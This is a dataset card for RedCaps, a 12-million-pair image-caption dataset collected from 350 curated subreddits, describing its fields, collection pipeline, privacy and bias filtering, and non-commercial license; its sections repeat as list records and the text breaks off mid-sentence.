Each instance in RedCaps represents a single Reddit image post:
### Data Fields
- 'image_id': Unique alphanumeric ID of the image post (assigned by Reddit).
- 'author': Reddit username of the image post author.
- 'image_url': Static URL for downloading the image associated with the post.
- 'raw_caption': Textual description of the image, written by the post author.
- 'caption': Cleaned version of "raw_caption" by us (see Q35).
- 'subreddit': Name of subreddit where the post was submitted.
- 'score': Net upvotes (discounting downvotes) received by the image post. This field is equal to 'None' if the image post is a crosspost.
- 'created_utc': Integer time epoch (in UTC) when the post was submitted to Reddit.
- 'permalink': Partial URL of the Reddit post (URL
- 'crosspost_parents': List of parent posts. This field is optional.
### Data Splits
All the data is contained in training set. The training set has nearly 12M (12,011,111) instances.
From the paper:
> We intend our dataset to be primarily used for pre-training with one or more specific downstream task(s) in mind. Hence, all instances in our dataset would be used for training while
the validation split is derived from downstream task(s). If users require a validation split, we
recommend sampling it such that it follows the same subreddit distribution as entire dataset.
## Dataset Creation
### Curation Rationale
From the paper:
> Large datasets of image-text pairs are widely used for pre-training generic representations
that transfer to a variety of downstream vision and vision-and-language tasks. Existing public
datasets of this kind were curated from search engine results (SBU Captions [1]) or HTML
alt-text from arbitrary web pages (Conceptual Captions [2, 31]). They performed complex
data filtering to deal with noisy web data. Due to aggressive filtering, their data collection is
inefficient and diversity is artificially supressed. We argue that the quality of data depends on
its source, and the human intent behind its creation. In this work, we explore Reddit – a social
media platform, for curating high quality data. We introduce RedCaps – a large dataset of
12M image-text pairs from Reddit. While we expect the use-cases of RedCaps to be similar to
existing datasets, we discuss how Reddit as a data source leads to fast and lightweight collection,
better data quality, lets us easily steer the data distribution, and facilitates ethically responsible data curation.
### Source Data
#### Initial Data Collection and Normalization
From the paper:
> Data Collection Pipeline
Reddit’s uniform structure allows us to parallelize data collection as independent tasks – each task
involves collecting posts submitted to a single subreddit in one year. Our collection pipeline has three steps: (1) subreddit selection, (2) image post filtering, and (3) caption cleaning.
Step 1. Subreddit selection: We collect data from a manually curated set of subreddits. Subreddits
have their own rules, community norms, and moderators so curating subreddits allows us to steer the
dataset’s composition without annotating individual instances. We select subreddits with a high volume of images posts, where images tend to be photographs (rather than memes, drawings, screenshots,
etc) and post titles tend to describe image content (rather than making jokes, political commentary,
etc). We do not select any NSFW, banned, or quarantined subreddits. We want to minimize the
number of people that appear in RedCaps, so we omit subreddits whose primary purpose is to share or
comment on images of people (such as celebrity pics or user selfies). We choose subreddits focused on
general photography (r/pics, r/itookapicture), animals (r/axolotls, r/birdsofprey, r/dachshund),
plants (r/roses, r/succulents), objects (r/classiccars, r/trains, r/mechanicalkeyboards), food
(r/steak, r/macarons), scenery (r/cityporn1
, r/desertporn), or activities (r/carpentry, r/kayaking).
In total we collect data from 350 subreddits; the full list can be found in Appendix A.
Step 2. Image post filtering: We use Pushshift [41] and Reddit [42, 43] APIs to download all image
posts submitted to our selected subreddits from 2008–2020. Posts are collected at least six months
after their creation to let upvotes stabilize. We only collect posts with images hosted on three domains:
Reddit (i.URL), Imgur (i.URL), and Flickr (URL). Some image posts contain
multiple images (gallery posts) – in this case we only collect the first image and associate it with
the caption. We discard posts with < 2 upvotes to avoid unappealing content, and we discard posts
marked NSFW (by their authors or subreddit moderators) to avoid pornographic or disturbing content.
Step 3. Caption cleaning: We expect Reddit post titles to be less noisy than other large-scale
sources of image captions such as alt-text [2, 31], so we apply minimal text cleaning. We lowercase
captions and use ftfy [44] to remove character accents, emojis, and non-latin characters, following
[29, 35, 36]. Then we apply simple pattern matching to discard all sub-strings enclosed in brackets
((.*), [.*]). These sub-strings usually give non-semantic information: original content tags [oc],
image resolutions (800x600 px), camera specs (shot with iPhone), self-promotion [Instagram:
@user], and other references (link in comments). Finally, like [31] we replace social media
handles (words starting with ‘@’) with a [USR] token to protect user privacy and reduce redundancy.
Due to such filtering, ≈12K (0.1%) captions in our dataset are empty strings. We do not discard them,
as subreddit names alone provide meaningful supervision. Unlike CC-3M or CC-12M that discard
captions without nouns or that don’t overlap image tags, we do not discard any instances in this step.
Through this pipeline, we collect 13.4M instances from 350 subreddits. Our collection pipeline is
less resource-intensive than existing datasets – we do not require webpage crawlers, search engines,
or large databases of indexed webpages. RedCaps is easily extensible in the future by selecting more
subreddits and collecting posts from future years. Next, we perform additional filtering to mitigate
user privacy risks and harmful stereotypes in RedCaps, resulting in final size of 12M instances.
#### Who are the source language producers?
Reddit is the singular data source for RedCaps.
### Annotations
#### Annotation process
The dataset is built using fully automatic data collection pipeline which doesn't require any human annotators.
#### Who are the annotators?
The annotation process doesn't require any human annotators.
### Personal and Sensitive Information
From the paper:
> Does the dataset relate to people?
The dataset pertains to people in that people wrote the captions and posted images to Reddit
that we curate in RedCaps. We made specific design choices while curating RedCaps to avoid
large quantities of images containing people:
(a) We collect data from manually curated subreddits in which most contain primarily pertains
to animals, objects, places, or activities. We exclude all subreddits whose primary purpose
is to share and describe images of people (such as celebrity photos or user selfies).
(b) We use an off-the-shelf face detector to find and remove images with potential presence of
human faces. We manually checked 50K random images in RedCaps (Q16) and found 79
images with identifiable human faces – the entire dataset may have ≈19K (0.15%) images
with identifiable people. Refer Section 2.2 in the main paper.
> Is it possible to identify one or more natural persons, either directly or indirectly (i.e., in
combination with other data) from the dataset?
Yes, all instances in RedCaps include Reddit usernames of their post authors. This could be
used to look up the Reddit user profile, and some Reddit users may have identifying information
in their profiles. Some images may contain human faces which could be identified by
appearance. However, note that all this information is already public on Reddit, and searching it
in RedCaps is no easier than searching directly on Reddit.
> Were the individuals in question notified about the data collection?
No. Reddit users are anonymous by default, and are not required to share their personal contact
information (email, phone numbers, etc.). Hence, the only way to notify the authors of RedCaps
image posts is by sending them private messages on Reddit. This is practically difficult to do
manually, and will be classified as spam and blocked by Reddit if attempted to programmatically
send a templated message to millions of users.
> Did the individuals in question consent to the collection and use of their data?
Users did not explicitly consent to the use of their data in our dataset. However, by uploading
their data on Reddit, they consent that it would appear on the Reddit plaform and will be
accessible via the official Reddit API (which we use to collect RedCaps).
> If consent was obtained, were the consenting individuals provided with a mechanism to
revoke their consent in the future or for certain uses?
Users have full control over the presence of their data in our dataset. If users wish to revoke
their consent, they can delete the underlying Reddit post – it will be automatically removed
dfrom RedCaps since we distributed images as URLs. Moreover, we provide an opt-out request
form on our dataset website for anybody to request removal of an individual instance if it is
potentially harmful (e.g. NSFW, violates privacy, harmful stereotypes, etc.).
## Considerations for Using the Data
### Social Impact of Dataset
From the paper:
> Has an analysis of the potential impact of the dataset and its use on data subjects (e.g.,
a data protection impact analysis) been conducted?
No.
### Discussion of Biases
From the paper:
> Harmful Stereotypes: Another concern with
Reddit data is that images or language may represent harmful stereotypes about gender, race, or other
characteristics of people [48, 49, 51]. We select only non-NSFW subreddits with active moderation
for collecting data. This stands in contrast to less curated uses of Reddit data, such as GPT-2 [35]
whose training data includes at least 63K documents from banned or quarantined subreddits which
may contain toxic language [53]. We attempt to further reduce harmful stereotypes in two ways:
> * NSFW images: We use the InceptionV3 [54] model from [55] to filter images detected as porn or hentai with confidence ≥ 0.9. Similar to face filtering, we estimated precision of our filtering and estimated amount of missed detections, shown in Table 1. The model detects 87K images with low
precision (∼1%) – most detections are non-NSFW images with pink and beige hues.
> * Potentially derogatory language: We filter instances whose captions contain words or phrases from a common blocklist [56]. It is important to note that such coarse filtering might suppress language from marginalized groups reclaiming slurs [51]; however, as RedCaps is not intended to describe people, we believe this is a pragmatic tradeoff to avoid propagating harmful labels.
> Reddit demographics: Reddit’s user demographics are not representative of the population at large.
Compared to US adults, Reddit users skew male (69% vs 49%), young (58% 18-29 years old vs
22%), college educated (36% vs 28%), and politically liberal (41% vs 25%) [57]. Reddit users
are predominantly white (63%) [57], and 49% of desktop traffic to Reddit comes from the United
States [58]. All of the subreddits in RedCaps use English as their primary language. Taken together,
these demographic biases likely also bias the types of objects and places that appear in images on
Reddit, and the language used to describe these images. We do not offer explicit countermeasures to
these biases, but users of RedCaps should keep in mind that size doesn’t guarantee diversity [51].
Subtler issues may also exist, such as imbalanced representation of demographic groups [59] or
gender bias in object co-occurrence [60] or language [61]. These are hard to control in internet
data, so we release RedCaps with explicit instructions on suitable use-cases; specifically requesting models not be trained to identify people, or make decisions that impact people. We document these instructions and other terms-of-use in a datasheet [45], provided in Appendix G.
> Does the dataset contain data that, if viewed directly, might be offensive, insulting, threatening, or might otherwise cause anxiety?
The scale of RedCaps means that we are unable to verify the contents of all images and
captions. However we have tried to minimize the possibility that RedCaps contains data that
might be offensive, insulting, threatening, or might cause anxiety via the following mitigations:
(a) We manually curate the set of subreddits from which to collect data; we only chose
subreddits that are not marked NSFW and which generally contain non-offensive content.
(b) Within our curated subreddits, we did not include any posts marked NSFW.
(c) We removed all instances whose captions contained any of the 400 potentially offensive
words or phrases. Refer Section 2.2 in the main paper.
(d) We remove all instances whose images were flagged NSFW by an off-the-shelf detector.
We manually checked 50K random images in RedCaps and found one image containing
nudity (exposed buttocks; no identifiable face). Refer Section 2.2 in the main paper
> Does the dataset identify any subpopulations (e.g., by age, gender)?
RedCaps does not explicitly identify any subpopulations. Since some images contain people
and captions are free-form natural language written by Reddit users, it is possible that some
captions may identify people appearing in individual images as part of a subpopulation.
> Were any ethical review processes conducted (e.g., by an institutional review board)?
We did not conduct a formal ethical review process via institutional review boards. However,
as described in Section 2.2 of the main paper and Q16 we employed several filtering mechanisms
to try and remove instances that could be problematic.
### Other Known Limitations
From the paper:
> Are there any errors, sources of noise, or redundancies in the dataset?
RedCaps is noisy by design since image-text pairs on the internet are noisy and unstructured.
Some instances may also have duplicate images and captions – Reddit users may have shared
the same image post in multiple subreddits. Such redundancies constitute a very small fraction
of the dataset, and should have almost no effect in training large-scale models.
> Does the dataset contain data that might be considered confidential (e.g., data that is
protected by legal privilege or by doctor-patient confidentiality, data that includes the
content of individuals non-public communications)?
No, the subreddits included in RedCaps do not cover topics that may be considered confidential. All posts were publicly shared on Reddit prior to inclusion in RedCaps.
## Additional Information
### Dataset Curators
From the paper:
> Four researchers at the University of Michigan (affiliated as of 2021) have created RedCaps:
Karan Desai, Gaurav Kaul, Zubin Aysola, and Justin Johnson.
### Licensing Information
The image metadata is licensed under CC-BY 4.0 license. Additionally, uses of this dataset are subject to Reddit API terms (URL
api-terms) and users must comply with Reddit User Agreeement, Content Policy,
and Privacy Policy – all accessible at URL
From the paper:
> RedCaps should only be used for non-commercial research. RedCaps should not be used for any tasks that involve identifying features related to people (facial recognition, gender, age, ethnicity identification, etc.) or make decisions that impact people (mortgages, job applications, criminal sentences; or moderation decisions about user-uploaded data that could result in bans from a website). Any commercial and for-profit uses of RedCaps are restricted – it should not be used to train models that will be deployed in production systems as part of a product offered by businesses or government agencies.
### Contributions
Thanks to @mariosasko for adding this dataset. | [
"# Dataset Card for RedCaps",
"## Table of Contents\n- Table of Contents\n- Dataset Information\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Information\n- Path /home/URL\n- Content type image\n- Tag sensor, common, ai, dataset\n- Description \n - Homepage: RedCaps homepage\n - Repository: RedCaps repository\n - Paper: RedCaps: web-curated image-text data created by the people, for the people\n - Leaderboard:\n - Point of Contact: Karan Desai",
"### Dataset Summary\n\nRedCaps is a large-scale dataset of 12M image-text pairs collected from Reddit.\nImages and captions from Reddit depict and describe a wide variety of objects and scenes.\nThe data is collected from a manually curated set of subreddits (350 total),\nwhich give coarse image labels and allow steering of the dataset composition\nwithout labeling individual instances. RedCaps data is created *by the people, for the people* – it contains everyday things that users like to share on social media, for example hobbies (r/crafts) and pets (r/shiba). Captions often contain specific and\nfine-grained descriptions (northern cardinal, taj mahal). Subreddit names provide relevant image\nlabels (r/shiba) even when captions may not (mlem!), and sometimes may group many visually\nunrelated images through a common semantic meaning (r/perfectfit).",
"### Dataset Preprocessing\n\nThis dataset doesn't download the images locally by default. Instead, it exposes URLs to the images. To fetch the images, use the following code:\n\n\n\nSome image links point to more than one image. You can process and downloaded those as follows:\n\n\n\nNote that in the above code, we use the 'datasets.Sequence' feature to represent a list of images for the multi-image links.",
"### Supported Tasks and Leaderboards\n\nFrom the paper:\n> We have used our dataset to train deep neural networks that perform image captioning, and\nthat learn transferable visual representations for a variety of downstream visual recognition tasks\n(image classification, object detection, instance segmentation).\n\n> We anticipate that the dataset could be used for a variety of vision-and-language (V&L) tasks,\nsuch as image or text retrieval or text-to-image synthesis.",
"### Languages\n\nAll of the subreddits in RedCaps use English as their primary language.",
"## Dataset Structure",
"### Data Instances\n\nEach instance in RedCaps represents a single Reddit image post:",
"### Data Fields\n\n- 'image_id': Unique alphanumeric ID of the image post (assigned by Reddit).\n- 'author': Reddit username of the image post author.\n- 'image_url': Static URL for downloading the image associated with the post.\n- 'raw_caption': Textual description of the image, written by the post author.\n- 'caption': Cleaned version of \"raw_caption\" by us (see Q35).\n- 'subreddit': Name of subreddit where the post was submitted.\n- 'score': Net upvotes (discounting downvotes) received by the image post. This field is equal to 'None' if the image post is a crosspost.\n- 'created_utc': Integer time epoch (in UTC) when the post was submitted to Reddit.\n- 'permalink': Partial URL of the Reddit post (URL\n- 'crosspost_parents': List of parent posts. This field is optional.",
"### Data Splits\n\nAll the data is contained in training set. The training set has nearly 12M (12,011,111) instances. \n\nFrom the paper:\n> We intend our dataset to be primarily used for pre-training with one or more specific downstream task(s) in mind. Hence, all instances in our dataset would be used for training while\nthe validation split is derived from downstream task(s). If users require a validation split, we\nrecommend sampling it such that it follows the same subreddit distribution as entire dataset.",
"## Dataset Creation",
"### Curation Rationale\n\nFrom the paper:\n> Large datasets of image-text pairs are widely used for pre-training generic representations\nthat transfer to a variety of downstream vision and vision-and-language tasks. Existing public\ndatasets of this kind were curated from search engine results (SBU Captions [1]) or HTML\nalt-text from arbitrary web pages (Conceptual Captions [2, 31]). They performed complex\ndata filtering to deal with noisy web data. Due to aggressive filtering, their data collection is\ninefficient and diversity is artificially supressed. We argue that the quality of data depends on\nits source, and the human intent behind its creation. In this work, we explore Reddit – a social\nmedia platform, for curating high quality data. We introduce RedCaps – a large dataset of\n12M image-text pairs from Reddit. While we expect the use-cases of RedCaps to be similar to\nexisting datasets, we discuss how Reddit as a data source leads to fast and lightweight collection,\nbetter data quality, lets us easily steer the data distribution, and facilitates ethically responsible data curation.",
"### Source Data",
"#### Initial Data Collection and Normalization\n\nFrom the paper:\n> Data Collection Pipeline\nReddit’s uniform structure allows us to parallelize data collection as independent tasks – each task\ninvolves collecting posts submitted to a single subreddit in one year. Our collection pipeline has three steps: (1) subreddit selection, (2) image post filtering, and (3) caption cleaning.\nStep 1. Subreddit selection: We collect data from a manually curated set of subreddits. Subreddits\nhave their own rules, community norms, and moderators so curating subreddits allows us to steer the\ndataset’s composition without annotating individual instances. We select subreddits with a high volume of images posts, where images tend to be photographs (rather than memes, drawings, screenshots,\netc) and post titles tend to describe image content (rather than making jokes, political commentary,\netc). We do not select any NSFW, banned, or quarantined subreddits. We want to minimize the\nnumber of people that appear in RedCaps, so we omit subreddits whose primary purpose is to share or\ncomment on images of people (such as celebrity pics or user selfies). We choose subreddits focused on\ngeneral photography (r/pics, r/itookapicture), animals (r/axolotls, r/birdsofprey, r/dachshund),\nplants (r/roses, r/succulents), objects (r/classiccars, r/trains, r/mechanicalkeyboards), food\n(r/steak, r/macarons), scenery (r/cityporn1\n, r/desertporn), or activities (r/carpentry, r/kayaking).\nIn total we collect data from 350 subreddits; the full list can be found in Appendix A.\nStep 2. Image post filtering: We use Pushshift [41] and Reddit [42, 43] APIs to download all image\nposts submitted to our selected subreddits from 2008–2020. Posts are collected at least six months\nafter their creation to let upvotes stabilize. We only collect posts with images hosted on three domains:\nReddit (i.URL), Imgur (i.URL), and Flickr (URL). Some image posts contain\nmultiple images (gallery posts) – in this case we only collect the first image and associate it with\nthe caption. We discard posts with < 2 upvotes to avoid unappealing content, and we discard posts\nmarked NSFW (by their authors or subreddit moderators) to avoid pornographic or disturbing content.\nStep 3. Caption cleaning: We expect Reddit post titles to be less noisy than other large-scale\nsources of image captions such as alt-text [2, 31], so we apply minimal text cleaning. We lowercase\ncaptions and use ftfy [44] to remove character accents, emojis, and non-latin characters, following\n[29, 35, 36]. Then we apply simple pattern matching to discard all sub-strings enclosed in brackets\n((.*), [.*]). These sub-strings usually give non-semantic information: original content tags [oc],\nimage resolutions (800x600 px), camera specs (shot with iPhone), self-promotion [Instagram:\n@user], and other references (link in comments). Finally, like [31] we replace social media\nhandles (words starting with ‘@’) with a [USR] token to protect user privacy and reduce redundancy.\nDue to such filtering, ≈12K (0.1%) captions in our dataset are empty strings. We do not discard them,\nas subreddit names alone provide meaningful supervision. Unlike CC-3M or CC-12M that discard\ncaptions without nouns or that don’t overlap image tags, we do not discard any instances in this step.\nThrough this pipeline, we collect 13.4M instances from 350 subreddits. Our collection pipeline is\nless resource-intensive than existing datasets – we do not require webpage crawlers, search engines,\nor large databases of indexed webpages. RedCaps is easily extensible in the future by selecting more\nsubreddits and collecting posts from future years. Next, we perform additional filtering to mitigate\nuser privacy risks and harmful stereotypes in RedCaps, resulting in final size of 12M instances.",
"#### Who are the source language producers?\n\nReddit is the singular data source for RedCaps.",
"### Annotations",
"#### Annotation process\n\nThe dataset is built using fully automatic data collection pipeline which doesn't require any human annotators.",
"#### Who are the annotators?\n\nThe annotation process doesn't require any human annotators.",
"### Personal and Sensitive Information\n\nFrom the paper:\n> Does the dataset relate to people?\nThe dataset pertains to people in that people wrote the captions and posted images to Reddit\nthat we curate in RedCaps. We made specific design choices while curating RedCaps to avoid\nlarge quantities of images containing people:\n(a) We collect data from manually curated subreddits in which most contain primarily pertains\nto animals, objects, places, or activities. We exclude all subreddits whose primary purpose\nis to share and describe images of people (such as celebrity photos or user selfies).\n(b) We use an off-the-shelf face detector to find and remove images with potential presence of\nhuman faces. We manually checked 50K random images in RedCaps (Q16) and found 79\nimages with identifiable human faces – the entire dataset may have ≈19K (0.15%) images\nwith identifiable people. Refer Section 2.2 in the main paper.\n\n> Is it possible to identify one or more natural persons, either directly or indirectly (i.e., in\ncombination with other data) from the dataset? \nYes, all instances in RedCaps include Reddit usernames of their post authors. This could be\nused to look up the Reddit user profile, and some Reddit users may have identifying information\nin their profiles. Some images may contain human faces which could be identified by\nappearance. However, note that all this information is already public on Reddit, and searching it\nin RedCaps is no easier than searching directly on Reddit.\n\n> Were the individuals in question notified about the data collection?\nNo. Reddit users are anonymous by default, and are not required to share their personal contact\ninformation (email, phone numbers, etc.). Hence, the only way to notify the authors of RedCaps\nimage posts is by sending them private messages on Reddit. This is practically difficult to do\nmanually, and will be classified as spam and blocked by Reddit if attempted to programmatically\nsend a templated message to millions of users.\n\n> Did the individuals in question consent to the collection and use of their data?\nUsers did not explicitly consent to the use of their data in our dataset. However, by uploading\ntheir data on Reddit, they consent that it would appear on the Reddit plaform and will be\naccessible via the official Reddit API (which we use to collect RedCaps).\n\n> If consent was obtained, were the consenting individuals provided with a mechanism to\nrevoke their consent in the future or for certain uses?\nUsers have full control over the presence of their data in our dataset. If users wish to revoke\ntheir consent, they can delete the underlying Reddit post – it will be automatically removed\ndfrom RedCaps since we distributed images as URLs. Moreover, we provide an opt-out request\nform on our dataset website for anybody to request removal of an individual instance if it is\npotentially harmful (e.g. NSFW, violates privacy, harmful stereotypes, etc.).",
"## Considerations for Using the Data",
"### Social Impact of Dataset\n\nFrom the paper:\n> Has an analysis of the potential impact of the dataset and its use on data subjects (e.g.,\na data protection impact analysis) been conducted?\nNo.",
"### Discussion of Biases\n\nFrom the paper:\n> Harmful Stereotypes: Another concern with\nReddit data is that images or language may represent harmful stereotypes about gender, race, or other\ncharacteristics of people [48, 49, 51]. We select only non-NSFW subreddits with active moderation\nfor collecting data. This stands in contrast to less curated uses of Reddit data, such as GPT-2 [35]\nwhose training data includes at least 63K documents from banned or quarantined subreddits which\nmay contain toxic language [53]. We attempt to further reduce harmful stereotypes in two ways:\n> * NSFW images: We use the InceptionV3 [54] model from [55] to filter images detected as porn or hentai with confidence ≥ 0.9. Similar to face filtering, we estimated precision of our filtering and estimated amount of missed detections, shown in Table 1. The model detects 87K images with low\nprecision (∼1%) – most detections are non-NSFW images with pink and beige hues.\n> * Potentially derogatory language: We filter instances whose captions contain words or phrases from a common blocklist [56]. It is important to note that such coarse filtering might suppress language from marginalized groups reclaiming slurs [51]; however, as RedCaps is not intended to describe people, we believe this is a pragmatic tradeoff to avoid propagating harmful labels.\n\n> Reddit demographics: Reddit’s user demographics are not representative of the population at large.\nCompared to US adults, Reddit users skew male (69% vs 49%), young (58% 18-29 years old vs\n22%), college educated (36% vs 28%), and politically liberal (41% vs 25%) [57]. Reddit users\nare predominantly white (63%) [57], and 49% of desktop traffic to Reddit comes from the United\nStates [58]. All of the subreddits in RedCaps use English as their primary language. Taken together,\nthese demographic biases likely also bias the types of objects and places that appear in images on\nReddit, and the language used to describe these images. We do not offer explicit countermeasures to\nthese biases, but users of RedCaps should keep in mind that size doesn’t guarantee diversity [51].\nSubtler issues may also exist, such as imbalanced representation of demographic groups [59] or\ngender bias in object co-occurrence [60] or language [61]. These are hard to control in internet\ndata, so we release RedCaps with explicit instructions on suitable use-cases; specifically requesting models not be trained to identify people, or make decisions that impact people. We document these instructions and other terms-of-use in a datasheet [45], provided in Appendix G.\n\n> Does the dataset contain data that, if viewed directly, might be offensive, insulting, threatening, or might otherwise cause anxiety?\nThe scale of RedCaps means that we are unable to verify the contents of all images and\ncaptions. However we have tried to minimize the possibility that RedCaps contains data that\nmight be offensive, insulting, threatening, or might cause anxiety via the following mitigations:\n(a) We manually curate the set of subreddits from which to collect data; we only chose\nsubreddits that are not marked NSFW and which generally contain non-offensive content.\n(b) Within our curated subreddits, we did not include any posts marked NSFW.\n(c) We removed all instances whose captions contained any of the 400 potentially offensive\nwords or phrases. Refer Section 2.2 in the main paper.\n(d) We remove all instances whose images were flagged NSFW by an off-the-shelf detector.\nWe manually checked 50K random images in RedCaps and found one image containing\nnudity (exposed buttocks; no identifiable face). Refer Section 2.2 in the main paper\n\n> Does the dataset identify any subpopulations (e.g., by age, gender)?\nRedCaps does not explicitly identify any subpopulations. Since some images contain people\nand captions are free-form natural language written by Reddit users, it is possible that some\ncaptions may identify people appearing in individual images as part of a subpopulation.\n\n> Were any ethical review processes conducted (e.g., by an institutional review board)?\nWe did not conduct a formal ethical review process via institutional review boards. However,\nas described in Section 2.2 of the main paper and Q16 we employed several filtering mechanisms\nto try and remove instances that could be problematic.",
"### Other Known Limitations\n\nFrom the paper:\n> Are there any errors, sources of noise, or redundancies in the dataset?\nRedCaps is noisy by design since image-text pairs on the internet are noisy and unstructured.\nSome instances may also have duplicate images and captions – Reddit users may have shared\nthe same image post in multiple subreddits. Such redundancies constitute a very small fraction\nof the dataset, and should have almost no effect in training large-scale models.\n\n> Does the dataset contain data that might be considered confidential (e.g., data that is\nprotected by legal privilege or by doctor-patient confidentiality, data that includes the\ncontent of individuals non-public communications)?\nNo, the subreddits included in RedCaps do not cover topics that may be considered confidential. All posts were publicly shared on Reddit prior to inclusion in RedCaps.",
"## Additional Information",
"### Dataset Curators\n\nFrom the paper:\n> Four researchers at the University of Michigan (affiliated as of 2021) have created RedCaps:\nKaran Desai, Gaurav Kaul, Zubin Aysola, and Justin Johnson.",
"### Licensing Information\n\nThe image metadata is licensed under CC-BY 4.0 license. Additionally, uses of this dataset are subject to Reddit API terms (URL\napi-terms) and users must comply with Reddit User Agreeement, Content Policy,\nand Privacy Policy – all accessible at URL\n\nFrom the paper:\n> RedCaps should only be used for non-commercial research. RedCaps should not be used for any tasks that involve identifying features related to people (facial recognition, gender, age, ethnicity identification, etc.) or make decisions that impact people (mortgages, job applications, criminal sentences; or moderation decisions about user-uploaded data that could result in bans from a website). Any commercial and for-profit uses of RedCaps are restricted – it should not be used to train models that will be deployed in production systems as part of a product offered by businesses or government agencies.",
"### Contributions\n\nThanks to @mariosasko for adding this dataset."
] | [
"TAGS\n#task_categories-image-to-text #task_ids-image-captioning #annotations_creators-found #language_creators-found #multilinguality-monolingual #size_categories-10M<n<100M #source_datasets-original #language-English #license-cc-by-4.0 #arxiv-2111.11431 #region-us \n",
"# Dataset Card for RedCaps",
"## Table of Contents\n- Table of Contents\n- Dataset Information\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Information\n- Path /home/URL\n- Content type image\n- Tag sensor, common, ai, dataset\n- Description \n - Homepage: RedCaps homepage\n - Repository: RedCaps repository\n - Paper: RedCaps: web-curated image-text data created by the people, for the people\n - Leaderboard:\n - Point of Contact: Karan Desai",
"### Dataset Summary\n\nRedCaps is a large-scale dataset of 12M image-text pairs collected from Reddit.\nImages and captions from Reddit depict and describe a wide variety of objects and scenes.\nThe data is collected from a manually curated set of subreddits (350 total),\nwhich give coarse image labels and allow steering of the dataset composition\nwithout labeling individual instances. RedCaps data is created *by the people, for the people* – it contains everyday things that users like to share on social media, for example hobbies (r/crafts) and pets (r/shiba). Captions often contain specific and\nfine-grained descriptions (northern cardinal, taj mahal). Subreddit names provide relevant image\nlabels (r/shiba) even when captions may not (mlem!), and sometimes may group many visually\nunrelated images through a common semantic meaning (r/perfectfit).",
"### Dataset Preprocessing\n\nThis dataset doesn't download the images locally by default. Instead, it exposes URLs to the images. To fetch the images, use the following code:\n\n\n\nSome image links point to more than one image. You can process and downloaded those as follows:\n\n\n\nNote that in the above code, we use the 'datasets.Sequence' feature to represent a list of images for the multi-image links.",
"### Supported Tasks and Leaderboards\n\nFrom the paper:\n> We have used our dataset to train deep neural networks that perform image captioning, and\nthat learn transferable visual representations for a variety of downstream visual recognition tasks\n(image classification, object detection, instance segmentation).\n\n> We anticipate that the dataset could be used for a variety of vision-and-language (V&L) tasks,\nsuch as image or text retrieval or text-to-image synthesis.",
"### Languages\n\nAll of the subreddits in RedCaps use English as their primary language.",
"## Dataset Structure",
"### Data Instances\n\nEach instance in RedCaps represents a single Reddit image post:",
"### Data Fields\n\n- 'image_id': Unique alphanumeric ID of the image post (assigned by Reddit).\n- 'author': Reddit username of the image post author.\n- 'image_url': Static URL for downloading the image associated with the post.\n- 'raw_caption': Textual description of the image, written by the post author.\n- 'caption': Cleaned version of \"raw_caption\" by us (see Q35).\n- 'subreddit': Name of subreddit where the post was submitted.\n- 'score': Net upvotes (discounting downvotes) received by the image post. This field is equal to 'None' if the image post is a crosspost.\n- 'created_utc': Integer time epoch (in UTC) when the post was submitted to Reddit.\n- 'permalink': Partial URL of the Reddit post (URL\n- 'crosspost_parents': List of parent posts. This field is optional.",
"### Data Splits\n\nAll the data is contained in training set. The training set has nearly 12M (12,011,111) instances. \n\nFrom the paper:\n> We intend our dataset to be primarily used for pre-training with one or more specific downstream task(s) in mind. Hence, all instances in our dataset would be used for training while\nthe validation split is derived from downstream task(s). If users require a validation split, we\nrecommend sampling it such that it follows the same subreddit distribution as entire dataset.",
"## Dataset Creation",
"### Curation Rationale\n\nFrom the paper:\n> Large datasets of image-text pairs are widely used for pre-training generic representations\nthat transfer to a variety of downstream vision and vision-and-language tasks. Existing public\ndatasets of this kind were curated from search engine results (SBU Captions [1]) or HTML\nalt-text from arbitrary web pages (Conceptual Captions [2, 31]). They performed complex\ndata filtering to deal with noisy web data. Due to aggressive filtering, their data collection is\ninefficient and diversity is artificially supressed. We argue that the quality of data depends on\nits source, and the human intent behind its creation. In this work, we explore Reddit – a social\nmedia platform, for curating high quality data. We introduce RedCaps – a large dataset of\n12M image-text pairs from Reddit. While we expect the use-cases of RedCaps to be similar to\nexisting datasets, we discuss how Reddit as a data source leads to fast and lightweight collection,\nbetter data quality, lets us easily steer the data distribution, and facilitates ethically responsible data curation.",
"### Source Data",
"#### Initial Data Collection and Normalization\n\nFrom the paper:\n> Data Collection Pipeline\nReddit’s uniform structure allows us to parallelize data collection as independent tasks – each task\ninvolves collecting posts submitted to a single subreddit in one year. Our collection pipeline has three steps: (1) subreddit selection, (2) image post filtering, and (3) caption cleaning.\nStep 1. Subreddit selection: We collect data from a manually curated set of subreddits. Subreddits\nhave their own rules, community norms, and moderators so curating subreddits allows us to steer the\ndataset’s composition without annotating individual instances. We select subreddits with a high volume of images posts, where images tend to be photographs (rather than memes, drawings, screenshots,\netc) and post titles tend to describe image content (rather than making jokes, political commentary,\netc). We do not select any NSFW, banned, or quarantined subreddits. We want to minimize the\nnumber of people that appear in RedCaps, so we omit subreddits whose primary purpose is to share or\ncomment on images of people (such as celebrity pics or user selfies). We choose subreddits focused on\ngeneral photography (r/pics, r/itookapicture), animals (r/axolotls, r/birdsofprey, r/dachshund),\nplants (r/roses, r/succulents), objects (r/classiccars, r/trains, r/mechanicalkeyboards), food\n(r/steak, r/macarons), scenery (r/cityporn1\n, r/desertporn), or activities (r/carpentry, r/kayaking).\nIn total we collect data from 350 subreddits; the full list can be found in Appendix A.\nStep 2. Image post filtering: We use Pushshift [41] and Reddit [42, 43] APIs to download all image\nposts submitted to our selected subreddits from 2008–2020. Posts are collected at least six months\nafter their creation to let upvotes stabilize. We only collect posts with images hosted on three domains:\nReddit (i.URL), Imgur (i.URL), and Flickr (URL). Some image posts contain\nmultiple images (gallery posts) – in this case we only collect the first image and associate it with\nthe caption. We discard posts with < 2 upvotes to avoid unappealing content, and we discard posts\nmarked NSFW (by their authors or 